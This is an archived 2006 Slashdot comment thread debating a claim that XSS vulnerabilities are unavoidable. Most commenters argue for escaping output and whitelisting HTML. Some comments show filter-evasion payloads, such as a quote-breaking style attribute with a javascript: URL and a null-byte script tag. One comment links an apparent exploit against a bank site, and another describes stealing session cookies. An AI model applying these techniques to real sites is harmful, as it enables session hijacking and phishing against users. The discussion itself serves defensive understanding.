Forgot your password?
typodupeerror

XSS Vulnerabilities Reviewed and Re-Classified 142

Posted by CowboyNeal
from the breaking-and-entering dept.
An anonymous reader writes "Security Analysts at NeoSmart Technologies have revisited the now-famous XSS-type security vulnerabilities and attempted to re-classify their status as a security vulnerability. The argument is that XSS vulnerabilities are not a mark of bad or insecure code but rather a nasty but unavoidable risk that's a part of JavaScript - and that even then, XSS 'vulnerable' sites are no less dangerous or vulnerable at heart." Are they unavoidable, or just a symptom of lazy coding, or both?
This discussion has been archived. No new comments can be posted.

XSS Vulnerabilities Reviewed and Re-Classified

Comments Filter:
  • Well (Score:5, Funny)

    by twalicek (984403) <twalicek@gma i l . com> on Thursday June 22, 2006 @09:55PM (#15586765)
    Samy is still my hero.
  • A hole is a hole (Score:5, Insightful)

    by Watson Ladd (955755) on Thursday June 22, 2006 @09:56PM (#15586769)
    Saying that these holes don't matter because websites can't avoid them with the standard method of doing things is just plain wrong from a security standpoint. If you are dealing with sensitive data, secure it. If the standard way won't let you, don't do it the standard way.
    • Your still young. It takes a few years to appreciate the difference between a quality hole and a not so quality hole...
      • Your still young. It takes a few years to appreciate the difference between a quality hole and a not so quality hole...

        how many years does it take to learn properly using your/you're?

        • Your still young. It takes a few years to appreciate the difference between a quality hole and a not so quality hole...

          how many years does it take to learn properly using your/you're?

          Something about this reminds me of glass houses and stone throwing, but I just can't put my finger on it.

        • how many years does it take to learn properly using your/you're?

          Correction:

          how many years does it take to learn proper use of your/you're?
          • I've never been a fan of the / contraction except occasionally when used with "and" and "or" (i.e. and/or).

            New correction (including capitalization):

            How many years does it take to learn the proper use of "your" and "you're"?

            or even:

            How many years of learning does it take to properly use "your" and "you're"?
  • User Content (Score:5, Insightful)

    by agnokapathetic (982555) on Thursday June 22, 2006 @09:58PM (#15586771)
    As buzzwordy as Web 2.0 is, end-user content is rapidly becoming the majority of the visible end-user internet experience (e.g. Digg, MySpace, Facebook, etc.) With thousands/millions of users posting content, XSS filters start to become an arms race against the latest techniques. With Internet Explorer even rendering code with <scr\x00ipt></s\x00cript> as valid code. Even when filters are put into place, all it takes is one XSS virus [bindshell.net] to take down an entire website.

    Even disabling Javascript content all together in websites, with user content, other methods can be used to steal cookies/sessions/user credentials. Flash attacks [cgisecurity.com] are becoming more and more common, and are near impossible to protect against. Users demand dynamic user-driven content, the companies comply, I'm just surprised this hasn't been more prevalent.

    --Joel
    Ajax Translator [parish.ath.cx]
    • Can't understand (Score:3, Insightful)

      by Vexorian (959249)

      Bulletin Boards have been effective against these issues for ages with bbcodes that use [] instead of > < . Also wikipedia has excellent formatting features without letting users ever use an html tag by themselves.

      By simply turning >< into &gt;&lt;before displaying content that was influenced by user input you get rid of every single XSS risk. If users complaint about it being too limited they should get their own site instead of depenging on blog/forum/ whatever other thing.

      • Re:Can't understand (Score:5, Informative)

        by Mark Round (211258) on Friday June 23, 2006 @02:25AM (#15587752) Homepage
        "By simply turning > into ><before displaying content that was influenced by user input you get rid of every single XSS risk"

        Rubbish. That's one of the most basic errors made when people start trying to filter out XSS. Suppose you have a form that takes a user's name and then uses it in a hidden field on the next page ? You could quide easily do something like :

        UserName" style="background:url(javascript:alert('Getting rid of angled brackets won't help you here'))

        Not an angled bracket in there, yet on most systems that'll work and display a popup. Hence the reason it's really not that simple, and the parent post referrs to "an arms race against the latest techniques"
        • That is why you also turn " into &quot; when it's inside double-quotes. This is the right solution, you just have to finetune it. It's not that hard, you just need to remember it every single time it should be done. It's the "remember" stuff that's hard.

          Include turning & into &amp;. Finally there's ' (&#039;) and you're done.

          Some languages has functions to do this for you [php.net], you just need to call them.
          • Re:Can't understand (Score:5, Informative)

            by jani (4530) on Friday June 23, 2006 @04:53AM (#15588141) Homepage
            Yet even this can be too simplistic, since there may be other things that's happening in the background.

            The first book to deal with this properly that I ever saw was Innocent Code [thathost.com] by Sverre H. Huseby (ISBN 0-470-85744-7, Wiley).

            I recommend this not only to people new to web programming, but also to seasoned programmers. There's more than one time that I've heard people say "pfah, I know the pit traps, I don't need this book", and a few weeks later tell me that there were things there they hadn't thought about.

            The book is concise and to the point.

            Note: I'm not neutral about this book; I was one of the people who read through the book and commented on it before publishing time, and Sverre is one of my friends.
        • Heh. And what happened to escaping quote signs? It's not even a new thing that only the latest JavaScript expert hackers discovered, but something that's also been known in the SQL Injection world for a long long time. (Yes, you can use prepared statements instead too, but you can also just escape the quotes and apostrophes.) And I wouldn't be surprised if it also was a part of some ancient CGI exploit.

          Basically if there's an "arms race", then escaping quotes isn't much of a part of it. The problem was know
      • Re:Can't understand (Score:5, Informative)

        by piranha(jpl) (229201) on Friday June 23, 2006 @07:57AM (#15588602) Homepage

        As someone else has pointed out, that's a naïve and incorrect approach.

        HTML is a standard. BBcode is a whim. HTML wins for its ubiquity. BBcode gives you nothing.

        People that don't think they can effectively and safely include HTML content from untrusted sources are not viewing the problem in a formal way. Address the cause, not the symptom.

        The cause is not thinking of and treating your HTML input as structured data. Rather, you're thinking of it as a character stream. Textual substitutions are a sign of that line of thought.

        Your user's HTML content is a tree structure. Parse it. Then filter out all elements that are not in your allowed-elements list. Filter out all element attributes that are not in your allowed-attributes lists. Construct these lists by examining the HTML specification and considering the risks of each element or attribute.

        Take it a step further. For each attribute value that contains a URI, parse that URI using a formal grammar. Filter out all URI schemes ("http", "ftp", etc) that are not in your allowed-schemes list. Certain characters, like non-printables, should never occur in a URI directly—signal an exception to the user to inform them of their error. Don't just stop if you don't find anything wrong! Reconstruct the URI from its constituent parts and replace the original with your sanitized version.

        Likewise, formally parse all CSS code: in referenced external stylesheets, embedded stylesheets, and in style attributes. Filter out anything not explicitly allowed. Replace any URIs with the output of the same URI-sanitization function above. Reserialize the content. (This is hard; drop all CSS as a short-cut.)

        When you're done, you'll serialize the HTML document and transmit that to your clients. I guarantee that this will eliminate XSS problems stemming from Internet Explorer incorrectly interpreting malformed HTML, CSS, or URIs. There are other attack vectors; be careful of what you allow to be included inline with documents, or linked to. (Think Flash.)

        This is the correct solution, and most flexible to your users. It's not another idiosyncratic language to learn. It's the world standard for rich textual documents on the World Wide Web.

        Unfortunately, it requires work.

  • Crazy (Score:5, Insightful)

    by Bogtha (906264) on Thursday June 22, 2006 @09:59PM (#15586778)

    The argument is that XSS vulnerabilities are not a mark of bad or insecure code but rather a nasty but unavoidable risk that's a part of JavaScript

    Er, no. XSS attacks are caused by sloppy web application developers that fail to encode user-supplied data for output in the appropriate way, and by sloppy web developers that trust that whatever was submitted by a user was submitted by the user intentionally.

    Both of these factors have technical solutions that are 100% effective and have been well-known for years. The former has nothing specifically to do with JavaScript anyway, it's just that the holes are most often used to sneak JavaScript onto a page.

    This article is a total crock of shit. For instance when it says:

    It is of the utmost importance to note that a page that has an "XSS vulnerablity" is no more dangerous than visiting a random result generated by a Google search

    It's no more dangerous in terms of security for the client machine. If Hotmail has a security hole, it doesn't make it more likely that somebody will get onto your computer. But they can still read and delete your email, and send email from your account.

    Actually, I take that back, it is more dangerous in terms of security for the client machine. With tools like the NoScript Firefox extension, and the similar mechanisms other browsers have, many people disable JavaScript for the random websites found with Google, but enable them for websites they trust, like Hotmail. So if Hotmail has an XSS vulnerability, they will be executing malicious JavaScript even though they only intended to allow trusted JavaScript to be executed.

    This author seems to have no real clue about web security. I guess this is why Slashdot shouldn't link to random weblog entries.

    • I'd second this post, a forum I lurk on had a major XSS issue a few years ago: flash uploads were allowed and a user found a way for his scripts to call home: he had the ability to embed flash on a page, then every time the flash'd display it'd phone home and send him the login informations/cookies of the user who'd displayed the flash.

      Long story short, he gave himself supadmin rights as a proof of concept and then told of the vulnerability to the dev of the forum software.

      He could just as well have destr

    • XSS attacks are caused by sloppy web application developers that fail to encode user-supplied data for output in the appropriate way, and by sloppy web developers that trust that whatever was submitted by a user was submitted by the user intentionally.

      That's how XSS happens. But why does it happen?

      Because the website accepts raw HTML of some kind. And with raw HTML comes JavaScript. Forget about filtering it perfectly. Yahoo has tried for years on end and still the occasional JavaScript injection issue pops

      • I have trouble believing that bbcode or any other method is full proof. It depends what you translate the bbcode into in your app. You may still introduce an issue. Perhaps user agents should allow you to disable features on pages using headers, etc. I could explicitly mark a page as not including javascript, etc. Obviously this wouldn't be full proof either, but it would certainly help. If the browser isn't expecting javascript or embedded objects then it can safely ignore them. Maybe we should star
        • I have trouble believing that bbcode or any other method is full proof. It depends what you translate the bbcode into in your app. You may still introduce an issue.

          Nobody said it was perfect. The first rule is to be paranoid. And yes, issues may always appear, but it would be with something you control. Not with something controlled by anybody out there, which expands the possibilities for mischief 1000-fold.

          Maybe we should start signing pages so that they don't display without a checksum, etc. [...] Raw xh

  • by madsheep (984404) on Thursday June 22, 2006 @10:00PM (#15586784) Homepage
    I think someone would be pretty hard pressed to convince me that XSS cannot be considered the earmark of bad or insecure coding in all or most cases. If anyone reads full disclosure we all know that any given moron can spend 24 hours a day looking on every website to find some XSS bug in the page. Now just because XSS exists in a site does not make it insecure or poorly coded (the later is arguable). However, when these XSS bugs exist on websites that use session cookies or have a login of some sort that allows users to take actions, post, edit things, etc. then it is a product of insecure and poor coding. The risks exists when something can be gained by a threat source by conducting an XSS attack. If a user can post something on slashdot that slaps over my slashdot username and password or my session cookie (allowing them to jump in on slashdot right now and post as me) then it is a security risk. Finding a XSS issue on a webpage such as one that www.arin.net (see Full Disclosure) really doesn't do anything or represent a risk. It is more about what can be gained or done from the XSS attack. As a quick side not to this dicussion.. XSS is *VERY* easy to prevent. Much more so than SQL injection. Who knows maybe these people will try and reclassify SQL injection as not being a problem either. Sanitizing user input by not allowing it or for example converting to < and > respectively is pretty easy and will stop almost all of these attacks. There is no excuse for not being able to secure a page with such coding practices to protect your site and users.
    • Finding a XSS issue on a webpage such as one that www.arin.net (see Full Disclosure) really doesn't do anything or represent a risk.

      So if someone visits a link to www.arin.net in good faith that it is a trusted website that wouldn't try to break into your machine, what happens when an XSS vulnerability on www.arin.net allows an attacker to redirect to a malicious site that harbours a remote exploit for Firefox, for example? I wouldn't call that "doesn't do anything or represent a risk".

    • or looking at where user input enters the page and restricting html to a limited number of tags. It's hard to think of all evil sequences. Thinking of what's good is simple.
    • XSS is *VERY* easy to prevent. Much more so than SQL injection.
      SQL injection is easy to prevent. Pass input though an escaping function or use parametrized queries.
    • by Anonymous Coward
      XSS is *much* harder to prevent than SQL injection. Why? If you're a competent coder, you can secure the code on the server end properly. In order to prevent XSS, you need to know about parsing bugs in the *browser*.
      • The solution to this problem would appear to be to whitelist what is *allowed*, rather than filtering out what is not. If you only need a simple commenting system then only allow plain text, convert double line breaks to </p><p> and wrap the whole thing in <p> ... </p>

        This is made alot more difficult with unicode/multibyte input however.
    • by masklinn (823351) <slashdot.org@mas k l inn.net> on Friday June 23, 2006 @02:55AM (#15587840)

      XSS is *VERY* easy to prevent. Much more so than SQL injection.

      Uh? SQL Injection is trivial to prevent, just escape your user-provided content (most languages do it automagically for you if you use prepared statements btw, and by "most languages" I mean to say "just about every language but PHP before mysqli_ and PDO")

      XSS, on the other hand, relies as much in your lack of escaping as in browser-specific "features" such as the ability of MSIE to execute arbitrary Javascript code embedded in CSS.

      XSS is much harder to prevent than SQL Injection.

      Which does not mean that it should ever be classified as "unavoidable" (it's not) or less dangerous than SQLI (it can, in fact, be much worse)

      • SQL Injection is trivial to prevent, just escape your user-provided content [...]

        So is XSS. Just escape all HTML in user-provided content. Ah, but you don't want that, do you? You want your bold and italic tags. Would SQL injection still be trivial to prevent if you didn't escape it altogether and wanted for "some" SQL to pass through and some not?
      • >> XSS, on the other hand, relies as much in your lack of escaping as in browser-specific "features" such as the ability of MSIE to execute arbitrary Javascript code embedded in CSS.

        I'm sorry, but if a developer is aware of this IE bug^H^H^Hfeature, then why can't he properly validate and encode tainted input in much the same way? Any arbitrary text will not execute from CSS, only JavaScript code will execute. And not only any JavaScript code, but code that is properly embedded for it to be recogniz
      • XSS, on the other hand, relies as much in your lack of escaping as in browser-specific "features" such as the ability of MSIE to execute arbitrary Javascript code embedded in CSS.

        There's no reason to allow a user to inject their own CSS code into site content.

        Filter out all style definitions from user-provided content before sending it to the client for rendering.

        Better yet, use a whitelist approach. If you're going to display the user's name, don't accept anything other than letters and whitespace. If yo
  • Yes, unavoidable. (Score:4, Informative)

    by Spazmania (174582) on Thursday June 22, 2006 @10:03PM (#15586795) Homepage
    Back in the 1980s' BBS days, I wrote a terminal emulator for the commodore 64 that would allow a BBS to enhance the user's experience by downloading and running short assembly programs. Users of any standard BBS software could even post such programs to the message boards for other users to enjoy.

    JMP 64738 (system reset) was the unavoidable result. The next version of the software recognized that the functionality could not be secured and removed it.
    • Re:Yes, unavoidable. (Score:4, Informative)

      by LordLucless (582312) on Thursday June 22, 2006 @10:58PM (#15587033)
      There's a difference between that example and XSS attacks on a website.

      In your example, the BBS was expecting code. It couldn't verify which code was good, and which code was bad, so it created an insecurity. On a website, the site expects textual content. It doesn't expect code. As long as you escape all user input properly, there's no chance of an XSS vulnerability. If you setup a website that allowed random users to upload javascript to be run on the site (rather than simply display the code as content) then that would be analogous to your BBS situation.
      • Re:Yes, unavoidable. (Score:4, Interesting)

        by Spazmania (174582) on Thursday June 22, 2006 @11:29PM (#15587143) Homepage
        I should hope there are differences between my situation and XSS attacks. They're seperated by the better part of two decades of advances in computing.

        Nevertheless, many of the fundamentals were similar:

        1. The client (terminal emulator) allowed the server (BBS) to download and run code.
        2. A BBS expecting a post (text message) received machine code from a user instead.
        3. The BBS sent that code to the next viewer expecting a text message.
        4. The viewer performed undesired and unauthorized actions as a result.

        The biggest difference is that today's crop of programmers keep insisting they'll find a way to secure the scripting functionality while I gave it up for bad right away.
        • I think you're missing what I'm saying.

          With the BBS situation, you created a tool that allowed people to distribute executable code via BBS. The BBS was designed for content, not executable code. Allowing it to distribute code made it insecure.

          These websites are designed for distributing content, the same as your bog-standard BBS. People upload content, website displays it. All that is needed to secure it, is to get it to treat code as text, rather than as code. In terms of HTML, that's easy. Just run a
          • Re:Yes, unavoidable. (Score:3, Informative)

            by Spazmania (174582)
            These websites are designed for distributing content, the same as your bog-standard BBS. People upload content, website displays it. All that is needed to secure it, is to get it to treat code as text, rather than as code. In terms of HTML, that's easy. Just run a regexp on all user-supplied data to convert to >, and the content will be treated as text.

            Yeah, I got that. The same argument could have been made about my software: all BBSes could have been programmed to recognize the text escape sequences th
            • Did that make the BBSes insecure? I say baloney. The BBSes weren't the problem. The problem was that my software would accept such text and render it as machine code.

              I'd say it did make the BBSes insecure. The BBSes were vulnerable to an attack made by a malicious user. That attack may not have been in sufficiently common usage to make it a concern, but it is a flaw. Writing an online application, and expecting users to "just behave" is naieve to the extreme today. Never trust that the user will give you
            • Did that make the BBSes insecure? I say baloney. The BBSes weren't the problem. The problem was that my software would accept such text and render it as machine code.

              Ho ho ho. And where did your software live? On the BBS. The problem was that your software had a classical security flaw: code injection. No matter what the code was. The software had a hole and in my book that makes the server it runs on "bad", as in "does bad things to users". So while the server itself wouldn't be compromised, was it desirab

              • And where did your software live? On the BBS.

                Incorrect. I believe I made it very clear that my software was the client-side terminal emulator. It required and used no special software on the server/BBS side. Like Javascript, it was intentionally designed to do all its work on the client-side so that no change was needed on the BBS.

                Browsers are meant to run JavaScript.

                And my terminal emulator was meant to run machine code. So what? Since when is it the server's responsibility to accomodate client-side featu
          • In terms of HTML, that's easy. Just run a regexp on all user-supplied data to convert < to &gt;, and the content will be treated as text.

            That’s true, but unfortunately it’s not as simple as that—most web-based bulletin-board software wants to allow the user to use lots of emphasis . I agree that it’s still not very hard to secure—but it’s easy to see how people get it wrong...

            • Yep, particularly when people start using javascript event handlers in otherwise harmless tags. Thats why I think a lot of sites use bbCode type stuff - [b] instead of <b. Just filter out all HTML tags, then convert bbCodes to HTML.
      • As long as you escape all user input properly, there's no chance of an XSS vulnerability.

        Define "escape all user input properly"

        • Take anything that can be interpreted as browser-executable code, and transform it into something that ain't.
        • Define "escape all user input properly"

          only allow generation of html that you know is sane, DO NOT let anything unrecognised go through.

          if your just interested in text you can do this as a simple replace operation, < becomes &lt;, & becomes &amp;

          if you wan't to offer formatting you have to parse the input and generate known safe html from it. You must also use appropriate sanitisation methods (e.g. make sure users can't embed extra quotes in a quote deliminated string) for anything you pass f
  • by dkleinsc (563838) on Thursday June 22, 2006 @10:06PM (#15586805) Homepage
    XSS is not the problem. JavaScript is (just for the record, at NeoSmart we feel JavaScript is more of a headache than it is a life-saver..), and XSS is but a result of the (many) inherent security holes in JavaScript and not in the package itself!

    That quote really says it all. The basic argument seems to be very simple: Javascript Sucks, Ergo XSS Vulnerabilities are inevitable. That's about as accurate as saying that if Chewbacca lives on Endor, you must acquit.

    As someone who's had to wrangle plenty of Javascript, I agree that it sucks, but I disagree with any argument that security vulnerabilities are inevitable. These days, they seem to be more a product of adding features without thinking about the security implications (Hey, let's allow email viewed in Outlook to run scripts!) than poor implementations of those ideas. Although implementation problems play a part: You're busy coding the nifty new feature, you get to a point where it works, and you happily go and check it into CVS oblivious to the buffer overflow you've introduced.

    Fundamentally, there's no such thing as a computer error, only a series of human errors buried deeply enough that they appear to be a computer error (with one exception, that of the expected hardware failure).
    • As someone who's had to wrangle plenty of Javascript, I agree that it sucks, but I disagree with any argument that security vulnerabilities are inevitable. These days, they seem to be more a product of adding features without thinking about the security implications (Hey, let's allow email viewed in Outlook to run scripts!) than poor implementations of those ideas. Although implementation problems play a part: You're busy coding the nifty new feature, you get to a point where it works, and you happily go a

  • First language (Score:5, Insightful)

    by ptaff (165113) on Thursday June 22, 2006 @10:24PM (#15586874) Homepage
    Are they unavoidable, or just a symptom of lazy coding, or both?

    I wouldn't say lazy, but naive. Lots of people now cut their teeth at programming with HTML/Javascript and a simple server-side scripting language, like PHP or ASP. For a reason unknown, these simple languages (PHP especially [develix.com]) try to create a blanket so thick around the coder that most of them don't even think about validating input.

    Crap like auto-string escaping, crap like automagic global variables, crap like easy access to eval(), auto variable casting, these help when learning to program so you can concentrate on the task at hand, but become a big fat no-no when deploying stuff in a networked environment.

    Going back to my first programs in BASIC/C/C++, they were probably filled with holes; but for sure they weren't available for the world to hack.

    • Going back to my first programs in BASIC/C/C++, they were probably filled with holes; but for sure they weren't available for the world to hack.
      You didn't open source your programs?! And you consider that to be good?! What are you doing at Slashdot?!

      Let your work free! I even publish all my grocery lists under a Creative Commons license for all to enjoy! Because /. tells me too!
    • Going back to my first programs in BASIC/C/C++, they were probably filled with holes; but for sure they weren't available for the world to hack.
      And how is that relevant? This is the Web, bad code in one place can now affect a lot of people. All the more reason to pay attention.
  • by NerdENerd (660369) on Thursday June 22, 2006 @10:25PM (#15586883)
    I work for a bank. A hacker found one page in the Internet banking system that echoed a value from a form into an error message. They then used this to inject some JavaScript which gathered user logons. They managed to acumulate about $70,000 of fools money into a holding account before they were caught. I don't feel particulay sorry for fools who fall for phishing scams but it was still a security hole in the web application that could simply be avoided by an echoding of values before echoing to the page. Since then all code is audited for SQL injection and XSS by an external company before being relesed to production.
    XSS is a real security threat.
  • by Snowhare (263311) on Thursday June 22, 2006 @10:30PM (#15586899) Homepage
    XSS is not unavoidable and it is a security vulnerability. Slashdot has a cookie based login system. This means that if there is an XSS vulnerability in Slashdot I can cause any action a logged in user (maybe, Commander Taco?) can cause by doing something as simple as tricking them into loading a web page with an 'invisible' 1 pixel tall frame exploiting the XSS. Saying XSS isn't a security vulnerability is like claiming that leaving your house keys under the doormat isn't a security vulnerability.
    • ...if there is an XSS vulnerability in Slashdot I can cause any action a logged in user...
      You don't need XSS [tinyurl.com] for that. :-)
    • ...loading a web page with an 'invisible' 1 pixel tall frame exploiting the XSS...
      Firefox and IE both evaluate scripting in hidden iframes. Just set the CSS to "display:none" and not a single pixel of the frame will be visible anywhere on the page. Although I really don't see why you would want to hide the frame very badly anyway.
  • Is it just me (Score:1, Interesting)

    by Anonymous Coward
    Is it just me or did this article not make sense. The information is not presented logically, and it seems to contradict itself. It is vague about details. Is Javascript the problem, or is it XSS, or is it bad users, or is it site owners, or hackers exploiting XSS? I still don't know.
  • Not me! (Score:2, Funny)

    by fuzzyfozzie (978329)
    I use VBScript, so I guess I'm safe.
  • by Ant P. (974313) on Thursday June 22, 2006 @10:47PM (#15586972) Homepage
    Are they unavoidable, or just a symptom of lazy coding, or both?

    Both, in different amounts depending on which scripting language you use.

    It's impossible to write perfect software - not even NASA can do that.
    On the other hand the languages aren't much help. PHP for instance allows you do to stupid things with user input variables. Depending on how your scripts work, you can see no errors for months and then all of a sudden half your database or site gets deleted. Great fun, that.
  • Unavoidable? (Score:3, Informative)

    by radical_dementia (922403) on Thursday June 22, 2006 @10:53PM (#15587010) Journal
    Perhaps the author is unaware of the PHP function strip_tags. Or in a more general sense, a simple regular expression can be used to remove script tags or all HTML tags from a string. That's seriously all you need to do to eliminate XSS. The only times when XSS holes exist are when lazy or oblivious coders forget to call the function on any input passed to a script.

    As far as the seriousness of XSS, I think the author is heavily downplaying the issue. With the xmlhttprequest it is easier than ever to use XSS to hijack users' sessions. For example, in a messageboard post or something I could put a simple script that uses an xmlhttprequest object to send the user's cookies with the session id to a remote script. The script can then immediatly hijack the user's session and steal information or whatnot, before the user even navigates to a different page.
    • by The MAZZTer (911996) <megazzt@nOSpam.gmail.com> on Thursday June 22, 2006 @11:13PM (#15587087) Homepage

      If I recall correctly, samy exploited MySpace (there's a link somewhere above if you never heard about it) by taking advantage of the fact that IE6 will execute Javascript: urls in CSS url() attributes (IE something like this:

      background-image: url(javascript:codehere

      Something like that at least. And of couse if you allow HTML tags with attributes anyone could stick a style="" on it and inject some javascript... in theory anyways.

      I read somewhere, and I agree, that the best solution is to strip ALL HTML and use your own tag set (most web forums are way ahead in this department). If you do insist on allowing a subset of HTML, use whitelists to define allowed tags and attributes etc, instead of blacklists... because with a whitelist, if you leave something out, oh well someone can't use a tag they should be able to, it's more restrictive than it should be, they file a bug report and it's fixed. With a blacklist if you leave something out, it's a potential security hole.

  • by neuroxmurf (314717) on Thursday June 22, 2006 @11:10PM (#15587078)
    If you allow local execution of code provided by untrusted remote sites, you have no security and never have, no matter how much the vendor assures you their "sandbox" is safe. XSS is not the security hole, it's just the latest batch of holes in the entire concept of client-side scripting.
  • Huh? (Score:3, Insightful)

    by GT_Alias (551463) on Thursday June 22, 2006 @11:46PM (#15587212)
    Buffer overflows are an unescapable symptom, C is the real problem. Car accidents aren't the problem...steering wheels are.

    Maybe the people writing web apps need better training? No matter how safe you make the language, there will be people using it who are inexperienced, unfamiliar, or otherwise uneducated about the nuances of paranoid programming. It's very narrow-sighted to blame the tool.
  • Really? (Score:5, Interesting)

    by NerdENerd (660369) on Thursday June 22, 2006 @11:51PM (#15587226)
    Click on this link for an example against CitiBank
    CitiBank Exploit [citibank.com]
    • That's good. Better looking than most phishing emails I get. Even Slashdot reports the domain as [citibank.com]

      Can make it work with https?
  • Most at risk (Score:2, Insightful)

    by Joebert (946227)
    Advertisers are the ones who are effected the worst by this.

    Banks & things like that are insured against loss, Federally in the case of banks.
    Advertisers who pay for people to click things on the other hand, are not.

    I'd bet CowboyNeals left nut there's thousands of dollars a day being scammed from advertisers through the use of XSS clicking adverts in the background, or changing the target address of an add banner.
  • That's like saying buffer overflows are a nasty unavoidable side effect of using C. They're exploits in the practical world, plain and simple. Caused by poor coding? Yes. Likely due to language difficiencies? Absolutely. Unavoidable? No, not really.
  • Complete Twit (Score:1, Insightful)

    by Anonymous Coward
    Read some of the other guy's articles, he's a complete twit. The best is the one on how javascript should be dead and replaced with VBScript, and how Firefox is "against" Javascript, and how javascript was "almost dead" until Gmail came around.

    Probably a 15 year old kid. Its a fucking wordpress site w/ the default theme. I mean, come on, seriously.
  • It's perfectly possible using simple hashing techniques to totally avoid XSS attacks.
  • As many of you know, Bruce Schneier has been pushing for new law to make software developers liable for defects, regardless of warranty disclaimers. While I don't dispute his analysis of the situation from a short-term security standpoint, I think such the liability he wants would be a disaster for self-employed software developers and the free/open-source software movement in general, and I think such law is unnecessary in the long run (remember that the software industry is still in its infancy).

    That s

  • by mrkitty (584915) on Friday June 23, 2006 @01:01AM (#15587473) Homepage
    Once again if you're curious what XSS is check out

    The Cross Site Scripting FAQ [cgisecurity.com]
  • I won't even comment on the security risk issue; though it takes a bit of social engineering, XSS can easily be leveraged for everything from session hijacking to plain old phishing.

    Unavoidable? I don't know ASP, for example, and when I was using it for the first time and had a user variable which was displayed as HTML, 2 minutes of Googling led me to HTMLEncode(). Problem solved, for the most part. A real programmer can accomplish this in any language, with a regex or whatever.

    Whoever wrote this obviously
    • When I came across the parent comment, I was curious to see how it actually worked. Unlike the common XSS attacks, this one doesn't require JavaScript to be enabled, when searching the vulnerable site, it outputs the search query back to the browser, the query is stored in the $s variable, apparently the variable isn't sanitized before being output, so one can inject whatever HTML code they like into the page. The vulnerability is mentioned here on the WP support forums [wordpress.org], sadly posters assumed that such code
  • Feeling a bit lost? No damn wonder.

    After reading the linked article, you probably don't know what XSS is unless you knew going in. Here's a link to a FAQ on XSS. http://www.cgisecurity.com/articles/xss-faq.shtml [cgisecurity.com].

    As for the article. My impression is that it is not very well written. I don't know enough about XSS to be sure, but for the most part I don't think it is a very accurate assessment. It appears to me that XSS attacks most certainly are a security issue and are by no means limited to Javas

  • by damburger (981828) on Friday June 23, 2006 @02:48AM (#15587812)
    ...we prefer to call it an 'unrequested Javascript surplus'"

    But that isn't the best bit:

    "Sites with XSS "vulnerabilities" aren't insecure. They're absoloutely no different than any other site - except that a user can manipulate the way content displays on an "insecure" page"

    Thats like saying 'Pearl Harbour wasn't "vunerable". It was absolutely no different than any other naval base - except that the Japanese could drop bombs on it'
  • In my master thesis I implemented a solution in the mozilla firefox web browser that protects the surfing user. It analyzes the data access and data flow in the JavaScript engine of the web browser.

    NoMoXSS (no more XSS)
    http://www.seclab.tuwien.ac.at/projects/jstaint/ [tuwien.ac.at]

    Although it is only a prototype of an implementation (in a rather old version of firefox), it shows the potential of this solution to stop XSS attacks.
  • Part of the problem with XSS is that pretty much every single web development tool out there has the wrong defaults. When you build a page in a templating system, anything that you insert into that template should be HTML escaped by default. Of course, you need an easy way to turn that off. But that simple act would probably fix 99% of holes out there. For example, in HTML::Mason [masonhq.com], I've set it up so that this:

    <% $foo %>

    gets escaped, whilst this does not.

    <% $foo |n %>

    The question remains

  • Can we mod the article -1 troll?
  • by supersnail (106701) on Friday June 23, 2006 @07:04AM (#15588437)
    Much of the article seems to be a diatribe against JavaScript more properly called ECMA script.
    I was always prejudiced against JavaScript but a couple of years ago I was stuck with a problem which could only be done in JavaScript (The selections in the second emnu depended on you choice in the first menu, all other checkboxes and menus depended on the second menu selection) or with about 50 static pages.
    I actually came to like it its actually a very clean and consistent programing language albeit with very few builtin features. After a couple of days the only times I ever felt the need to RTFM was for the exact names of the various bits of the web browsers DOM structure.

    How anyone could recomend VB over javascript is beyond me, and, I note no one has suggested the return of the Java Applet!

    As for buggy, well there are javascripts with bugs in but there are very, very few bugs in the ECMAscript implementations I have dealt with.
  • back around '99 I worked for a very short time for an 'e-commerce website development' company. I was their very first dedicated tester.

    When I pointed out that users could enter javascript as a user name to be displayed to other users, they didn't care, the response was "Why would anyone want to hack a website?".

    The last website this company produced before then was for a major gaming company that produced a VERY popular collectable card game and had bought out another company that made a paper RPG game fea

"When it comes to humility, I'm the greatest." -- Bullwinkle Moose

Working...